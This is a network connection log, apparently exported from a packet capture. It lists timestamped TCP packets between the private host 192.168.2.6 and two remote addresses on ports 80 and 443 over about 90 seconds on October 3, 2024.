Oct 3, 2024 03:28:45.352870941 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.530143976 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:45.530262947 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.530472994 CEST	443	52952	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:45.530530930 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:45.530551910 CEST	52952	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:47.844405890 CEST	52950	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:47.844409943 CEST	52953	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:47.849339962 CEST	80	52953	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:47.849493980 CEST	52953	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:47.849612951 CEST	80	52950	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:47.849694967 CEST	52953	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:47.849730968 CEST	52950	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:47.854604006 CEST	80	52953	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:48.327817917 CEST	80	52953	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:48.329490900 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.329535961 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.329621077 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.330132008 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.330152988 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.497039080 CEST	52953	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:48.790587902 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.791033983 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.815557003 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.815584898 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.815959930 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.817178011 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.859416962 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.923830986 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:48.930109978 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:48.930120945 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:49.261738062 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:49.261826992 CEST	443	52954	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:49.261883974 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:49.262511969 CEST	52954	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:49.262793064 CEST	52953	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:49.263576031 CEST	52955	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:49.267770052 CEST	80	52953	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:49.267831087 CEST	52953	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:49.268325090 CEST	80	52955	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:49.268404007 CEST	52955	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:49.268539906 CEST	52955	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:49.273600101 CEST	80	52955	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:49.733843088 CEST	80	52955	104.26.12.205	192.168.2.6
Oct 3, 2024 03:28:49.735028028 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:49.735079050 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:49.735127926 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:49.735436916 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:49.735450029 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:49.793905020 CEST	52955	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:28:50.194494963 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.196227074 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.196261883 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.314683914 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.314914942 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.314940929 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.639801979 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.639923096 CEST	443	52956	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.640187025 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.640548944 CEST	52956	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.641601086 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.641627073 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:50.642158985 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.642468929 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:50.642478943 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.120080948 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.121814966 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:51.121829987 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.240582943 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.240921021 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:51.240942001 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.530606985 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.530685902 CEST	443	52957	104.21.54.163	192.168.2.6
Oct 3, 2024 03:28:51.530891895 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:28:51.531156063 CEST	52957	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:21.545614004 CEST	52955	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:21.550890923 CEST	80	52955	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:21.551058054 CEST	52955	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:21.553785086 CEST	52958	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:21.558937073 CEST	80	52958	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:21.559252977 CEST	52958	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:21.559252977 CEST	52958	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:21.564117908 CEST	80	52958	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:22.024835110 CEST	80	52958	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:22.026397943 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:22.026448965 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:22.026565075 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:22.026899099 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:22.026910067 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:22.098503113 CEST	52958	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:22.548795938 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:22.551337957 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:22.551410913 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:22.676584005 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:22.678427935 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:22.678481102 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.025456905 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.025557041 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.026268959 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.026345015 CEST	443	52959	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.026367903 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.026422024 CEST	52958	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:23.026513100 CEST	52959	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.027173996 CEST	52960	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:23.031553984 CEST	80	52958	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:23.031673908 CEST	52958	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:23.031945944 CEST	80	52960	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:23.032162905 CEST	52960	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:23.032233953 CEST	52960	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:23.038018942 CEST	80	52960	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:23.514765978 CEST	80	52960	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:23.516000032 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.516047955 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.516165972 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.516515970 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.516530991 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.611617088 CEST	52960	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:23.987396955 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:23.989696026 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:23.989727020 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.123123884 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.123388052 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.123418093 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.453234911 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.453330040 CEST	443	52961	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.453376055 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.453898907 CEST	52961	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.454799891 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.454830885 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.454890013 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.455121994 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.455133915 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.920054913 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:24.923064947 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:24.923091888 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:25.035664082 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:25.035996914 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:25.036032915 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:25.319643021 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:25.319737911 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:25.320703030 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:25.320729971 CEST	443	52962	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:25.320765018 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:25.321039915 CEST	52962	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:55.321871042 CEST	52960	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:55.321872950 CEST	52964	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:55.326845884 CEST	80	52964	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:55.327110052 CEST	80	52960	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:55.327197075 CEST	52960	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:55.327198982 CEST	52964	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:55.327461004 CEST	52964	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:55.332235098 CEST	80	52964	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:55.790553093 CEST	80	52964	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:55.791804075 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:55.791850090 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:55.791918993 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:55.794992924 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:55.795008898 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:55.934540033 CEST	52964	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:56.282968044 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:56.302845001 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:56.302867889 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:56.404083014 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:56.422996998 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:56.423017025 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:56.770617962 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:56.770736933 CEST	443	52965	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:56.770838976 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:56.771249056 CEST	52965	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:56.771567106 CEST	52964	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:56.772315979 CEST	52966	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:56.776519060 CEST	80	52964	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:56.776583910 CEST	52964	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:56.777097940 CEST	80	52966	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:56.777165890 CEST	52966	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:56.777282000 CEST	52966	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:56.782033920 CEST	80	52966	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:57.044562101 CEST	52966	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:57.090677977 CEST	80	52966	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:57.147188902 CEST	80	52966	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:57.147238970 CEST	52966	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:58.203212023 CEST	52967	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:58.208197117 CEST	80	52967	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:58.208303928 CEST	52967	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:58.208437920 CEST	52967	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:58.213218927 CEST	80	52967	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:58.682671070 CEST	80	52967	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:58.684276104 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:58.684330940 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:58.684549093 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:58.685031891 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:58.685053110 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:58.796662092 CEST	52967	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:59.148104906 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:59.150183916 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:59.150199890 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:59.286326885 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:59.286751032 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:59.286781073 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:59.680473089 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:59.680646896 CEST	443	52968	104.21.54.163	192.168.2.6
Oct 3, 2024 03:29:59.680701971 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:59.681123972 CEST	52968	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:29:59.681473970 CEST	52967	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:59.682274103 CEST	52969	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:59.686503887 CEST	80	52967	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:59.686564922 CEST	52967	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:59.687098980 CEST	80	52969	104.26.12.205	192.168.2.6
Oct 3, 2024 03:29:59.687170029 CEST	52969	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:59.687283039 CEST	52969	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:29:59.692035913 CEST	80	52969	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:00.179977894 CEST	80	52969	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:00.181871891 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:00.181909084 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:00.182216883 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:00.182538033 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:00.182550907 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:00.325208902 CEST	52969	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:00.675848961 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:00.680016994 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:00.680038929 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:00.817059994 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:00.818505049 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:00.818516970 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.122807980 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.122977018 CEST	443	52970	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.126317978 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.132632971 CEST	52970	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.134438992 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.134481907 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.134598970 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.135236979 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.135257959 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.607624054 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.646169901 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.646198988 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.773793936 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:01.774132967 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:01.774152994 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:02.093472958 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:02.093568087 CEST	443	52971	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:02.093616962 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:02.094223022 CEST	52971	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:08.342828035 CEST	52969	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:08.343978882 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:08.348115921 CEST	80	52969	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:08.348170996 CEST	52969	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:08.348908901 CEST	80	52972	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:08.349003077 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:08.349116087 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:08.353890896 CEST	80	52972	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:09.501427889 CEST	80	52972	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:09.501519918 CEST	80	52972	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:09.501576900 CEST	80	52972	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:09.503072977 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:09.503072977 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:09.507461071 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:09.507514954 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:09.507781029 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:09.509047031 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:09.509063005 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:09.997025967 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:09.999450922 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:09.999483109 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:10.128746986 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:10.129092932 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:10.129115105 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:10.546870947 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:10.546994925 CEST	443	52973	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:10.547056913 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:10.547586918 CEST	52973	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:10.547863007 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:10.548875093 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:10.552923918 CEST	80	52972	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:10.552978039 CEST	52972	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:10.553636074 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:10.553709030 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:10.553853989 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:10.558665037 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:11.029313087 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:11.030446053 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:11.030519009 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:11.030605078 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:11.030908108 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:11.030926943 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:11.138171911 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:11.515908957 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:11.518234968 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:11.518271923 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:11.928117990 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:11.928174973 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.613482952 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.819411993 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.819484949 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.924635887 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.924837112 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.925184965 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.925234079 CEST	443	52975	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.925255060 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.925390005 CEST	52975	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.926429033 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.926479101 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:12.926582098 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.926928043 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:12.926948071 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.417453051 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.419969082 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:13.419991016 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.556924105 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.557271004 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:13.557286024 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.847722054 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.847810030 CEST	443	52976	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:13.848015070 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:13.849457026 CEST	52976	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:19.985565901 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:19.990988970 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:20.111726046 CEST	80	52974	104.26.12.205	192.168.2.6
Oct 3, 2024 03:30:20.112410069 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:20.112462997 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:20.112528086 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:20.112812042 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:20.112823009 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:20.325249910 CEST	52974	80	192.168.2.6	104.26.12.205
Oct 3, 2024 03:30:20.573211908 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:20.575303078 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:20.575331926 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:20.712165117 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:20.712521076 CEST	52978	443	192.168.2.6	104.21.54.163
Oct 3, 2024 03:30:20.712553978 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.088345051 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.088495970 CEST	443	52978	104.21.54.163	192.168.2.6
Oct 3, 2024 03:30:21.089267969 CEST	52978	443	192.168.2.6	104.21.54.163
